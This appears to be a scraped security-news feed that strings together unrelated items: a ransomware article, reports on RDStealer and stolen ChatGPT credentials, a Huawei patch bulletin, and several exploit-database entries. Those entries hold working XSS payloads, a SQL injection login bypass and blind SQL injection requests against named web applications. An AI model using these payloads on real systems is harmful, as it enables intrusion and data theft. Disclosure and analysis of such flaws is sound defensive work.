Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

CVE-2020-21058: typora(0.9.79) XSS to RCE · Issue #2959 · typora/typora-issues

Learn how the latest ransomware variant has heightened attack execution speed and what that means for cybersecurity operations.

There has always been a competition in the ransomware world, with attackers trying to improve the speed of campaign execution and organizations continuously innovating to get ahead of those attacks. Speed is so decisive that ransomware-as-a-service (RaaS) platforms even advertise the speed of execution for prospective ransomware affiliates. LockBit, one of the most successful ransomware groups, has publicly listed its encryption speed versus its competitors' speed to demonstrate its advantage. In short, speed is critical on both sides of the ransomware battle.

Rorschach, one of the newest ransomware variants, has officially taken the "encryption speed king" title from LockBit 3.0. The Rorschach variant was first detected in April 2023 and is a customized strain of the Babuk ransomware code. Rorschach brings speed into the spotlight and warrants a closer look at how ransomware creators increase speed across multiple dimensions of their victims' environment.

**Malware Propagation Speed**

One important speed component is the ability to quickly spread malware as far and wide as possible. In the past, ransomware groups have leveraged many techniques for fast propagation, including supply chain attacks and using existing IT and security tools to propagate their malware.

However, Rorschach has built and demonstrated an interesting self-propagating and autonomous capability that leverages Active Directory (AD) Domain Group Policy Objects (GPO). This enables the malware to rapidly propagate across the network and execute ransomware on every endpoint at blistering speeds. Because of this, the Rorschach variant has pushed the needle further than ever with these interesting innovations for self-propagation.

To counter this innovation, organizations must adopt tools that combat self-propagation, such as active defense technology, which deals with ransomware in real time and detects attackers as soon as possible.

**Data Encryption Speed for Extortion**

On Windows endpoints, Rorschach's creators have carefully chosen to use HC-128, a stream cipher that encrypts large streams of file data with impressive performance. Rorschach ransomware uses the asymmetric key exchange method, which is based on Curve25519. It's efficient in both computational performance and memory consumption while simultaneously retaining strong security.

Like many other ransomware strains, including LockBit and Babuk, Rorschach encrypts only parts of a file instead of the entire file's contents. This tactic is known as intermittent encryption, which has become popular in the last couple of years for its efficiency and speed. Encrypting only parts of the file dramatically reduces the time required to complete the data encryption. By shortening the encryption phase of an attack, ransomware operators give security tools less opportunity to detect them. Data encryption is the visible part of an attack, and attackers are shortening that window to better their odds in the race against defenders.

Like LockBit and other well-known ransomware, Rorschach also leverages parallelism and multithreading for high-performance speedy encryption. Because Rorschach ransomware implementation is customized for each operating system type, it leverages specific Windows capabilities known as I/O completion ports for efficient multithreaded encryption. This technique is borrowed from LockBit 3.0, REvil, Hive, BlackMatter, and DarkSide.

While the data encryption speed rankings among ransomware gangs is interesting, it is important to note that virtually all modern ransomware variants already perform data encryption very quickly. Unfortunately, all are much faster than what most security teams or tools are equipped to deal with.

However, while Rorschach does outpace competitors in speed in some realms, it currently does not appear to exfiltrate data for double extortion. This is in comparison to other ransomware gangs, including LockBit, that first exfiltrate enterprise data. While data encryption is the visible part of a ransomware attack, data exfiltration is the invisible race against defenders. Ransomware actors typically exfiltrate large amounts of data for double extortion before beginning data encryption.

**Staying Under the Radar of Defenders**

One of Rorschach's particularly innovative moves is its ability to stay under the radar by using deception technology — a double-edged sword that is useful for attackers and defenders. Rorschach's advanced security evasion capabilities leverage deception techniques and concepts for malicious purposes, including using obfuscation techniques, valid domain user and service accounts, and argument spoofing techniques to hide the true capabilities of the ransomware.

This kind of defense evasion is new to ransomware threats, but it's not new in the cybersecurity world. To combat Rorschach's technique for self-propagation using AD GPOs and high-speed campaigns, defenders need solutions that can detect and respond to real-time, novel, and autonomous ransomware capabilities.

Rorschach ransomware has borrowed innovations from previously successful ransomware groups including LockBit, Babuk, and REvil and built on their success by adding lightning-fast innovations. The Rorschach variant demonstrates the importance of continuous defender innovation, as well as the need to counter attacker movement in real time.

Rorschach Ransomware: What You Need to Know

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

Student Study Center Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)# Date of found: 12/05/2023# Exploit Author: VIVEK CHOUDHARY @sudovivek# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/# CVE: CVE-2023-33580# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580Vulnerability Description -    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.Steps to Reproduce -    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:            1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.        2.  Click on the "Admin" button to navigate to the admin login page.        3.  Login to the Admin account using the default credentials.                - Username: admin                - Password: Test@123        4.  Proceed to the Admin Profile page.        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.        6.  Click on the "Submit" button.        7.  Refresh the page, and the injected payload will be executed.As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

Student Study Center Management System 1.0 Cross Site Scripting

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

    # Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}

The Shop 2.5 SQL Injection

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer.
"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.
Evidence gathered by the Romanian

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called **RDStealer**.

"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.

Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia.

In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection.

A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads.

One of the sub-folders in question is "C:\\Program Files\\Dell\\CommandUpdate," which is the directory for a legitimate Dell application called Dell Command | Update.

Bitdefender said all the machines infected over the course of the incident were manufactured by Dell, suggesting that the threat actors deliberately chose this folder to camouflage the malicious activity.

This line of reasoning is bolstered by the fact that the threat actor registered command-and-control (C2) domains such as "dell-a\[.\]ntp-update\[.\]com" with the goal of blending in with the target environment.

The intrusion set is characterized by the use of a server-side backdoor called RDStealer, which specializes in gathering clipboard content and keystroke data from the host.

But what makes it stand out is its capability to "monitor incoming RDP \[Remote Desktop Protocol\] connections and compromise a remote machine if client drive mapping is enabled."

Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome.

"This highlights the fact that threat actors actively seek credentials and saved connections to other systems," Bitdefender's Marin Zugec said in a second analysis.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

What's more, the connecting RDP clients are infected with another Golang-based custom malware known as Logutil to maintain a persistent foothold on the victim network using DLL side-loading techniques and facilitate command execution.

Not much is known about the threat actor other than the fact that it has been active dating back to at least 2020.

"Cybercriminals continually innovate and explore novel methods to enhance the reliability and stealthiness of their malicious activities," Zugec said.

"This attack serves as a testament to the increasing sophistication of modern cyber attacks, but also underscores the fact that threat actors can leverage their newfound sophistication to exploit older, widely adopted technologies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.
The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.
"The number of

Endpoint Security / Password

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.

The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.

"The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said. "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year."

Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh.

A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealer, followed by Vidar and RedLine.

Information stealers have become popular among cybercriminals for their ability to hijack passwords, cookies, credit cards, and other information from browsers, and cryptocurrency wallet extensions.

"Logs containing compromised information harvested by info stealers are actively traded on dark web marketplaces," Group-IB said.

"Additional information about logs available on such markets includes the lists of domains found in the log as well as the information about the IP address of the compromised host."

Typically offered based on a subscription-based pricing model, they have not only lowered the bar for cybercrime, but also serve as a conduit for launching follow-on attacks using the siphoned credentials.

"Many enterprises are integrating ChatGPT into their operational flow," Dmitry Shestakov, head of threat intelligence at Group-IB, said.

"Employees enter classified correspondences or use the bot to optimize proprietary code. Given that ChatGPT's standard configuration retains all conversations, this could inadvertently offer a trove of sensitive intelligence to threat actors if they obtain account credentials."

To mitigate such risks, it's recommended that users follow appropriate password hygiene practices and secure their accounts with two-factor authentication (2FA) to prevent account takeover attacks.

The development comes amid an ongoing malware campaign that's leveraging fake OnlyFans pages and adult content lures to deliver a remote access trojan and an information stealer called DCRat (or DarkCrystal RAT), a modified version of AsyncRAT.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"In observed instances, victims were lured into downloading ZIP files containing a VBScript loader which is executed manually," eSentire researchers said, noting the activity has been underway since January 2023.

"File naming convention suggests the victims were lured using explicit photos or OnlyFans content for various adult film actresses."

It also follows the discovery of a new VBScript variant of a malware called GuLoader (aka CloudEyE) that employs tax-themed decoys to launch PowerShell scripts capable of retrieving and injecting Remcos RAT into a legitimate Windows process.

"GuLoader is a highly evasive malware loader commonly used to deliver info-stealers and Remote Administration Tools (RATs)," the Canadian cybersecurity company said in a report published earlier this month.

"GuLoader leverages user-initiated scripts or shortcut files to execute multiple rounds of highly obfuscated commands and encrypted shellcode. The result is a memory-resident malware payload operating inside a legitimate Windows process."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces

Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the May 2023 Android security bulletin:

Critical: none

High: CVE-2023-21109, CVE-2023-20914, CVE-2023-21103, CVE-2023-21111, CVE-2023-21118, CVE-2023-21665, CVE-2023-21666, CVE-2022-46891, CVE-2021-0877

Medium: CVE-2023-21116

Low: none

Already included in previous updates: CVE-2023-21085, CVE-2023-20909, CVE-2023-20967, CVE-2023-21080, CVE-2023-21081, CVE-2023-21082, CVE-2023-21083, CVE-2023-21089, CVE-2023-21092, CVE-2023-21094, CVE-2023-21097, CVE-2023-21098, CVE-2023-21099, CVE-2023-20950

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2022-48486: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48487: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48488: Vulnerability of bypassing the default desktop security controls

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause unauthorized modifications to the desktop.

CVE-2022-48489: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48490: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48491: Vulnerability of missing authentication on certain HUAWEI phones

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can lead to ads and other windows to display at any time.

CVE-2022-48492: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48493: Configuration defects in the secure OS module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48494: Vulnerability of lax app identity verification in the pre-authorization function

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

CVE-2022-48495: Vulnerability of unauthorized access to foreground app information

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause foreground app information to be obtained.

CVE-2022-48496: Vulnerability of lax app identity verification in the pre-authorization function

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will cause malicious apps to become pre-authorized.

CVE-2022-48497: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48498: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48499: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48500: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-48501: Configuration defects in the secure OS module

Severity: Critical

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2023-34155: Vulnerability of unauthorized calling on HUAWEI phones and tablets

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2023-34156: Vulnerability of services denied by early fingerprint APIs on HarmonyOS products

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause services to be denied.

CVE-2023-34158: Vulnerability of public APIs and methods in WindowManageServices being called by malicious third-party apps

Severity: High

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause unauthorized access by third-party apps.

CVE-2023-34159: Improper permission control vulnerability in the Notepad app

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of the vulnerability may lead to privilege escalation, which affects availability and confidentiality.

CVE-2023-34160: Vulnerability of public APIs and methods in WindowManageServices being called by malicious third-party apps

Severity: High

Affected versions: EMUI 13.0.0, EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause unauthorized access by third-party apps.

CVE-2023-34161: Inappropriate authorization vulnerability in the SettingsProvider module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.

CVE-2023-34162: Version update determination vulnerability in the user profile module

Severity: Medium

Affected versions: EMUI 13.0.0

Impact: Successful exploitation of this vulnerability may cause repeated HMS Core updates and cause services to fail.

CVE-2023-34163: Permission control vulnerability in the window management module

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.

CVE-2023-34164: Improper permission verification vulnerability in the SDK on which the MediaPlaybackController module depends

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2023-34166: Vulnerability of system restart triggered by abnormal callbacks passed to APIs

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability may cause the system to restart.

CVE-2023-34167: Vulnerability of spoofing trustlists of HUAWEI desktop

Severity: Medium

Affected versions: EMUI 13.0.0, EMUI 12.0.1, EMUI 12.0.0, EMUI 11.0.1

Impact: Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.

Tag

#windows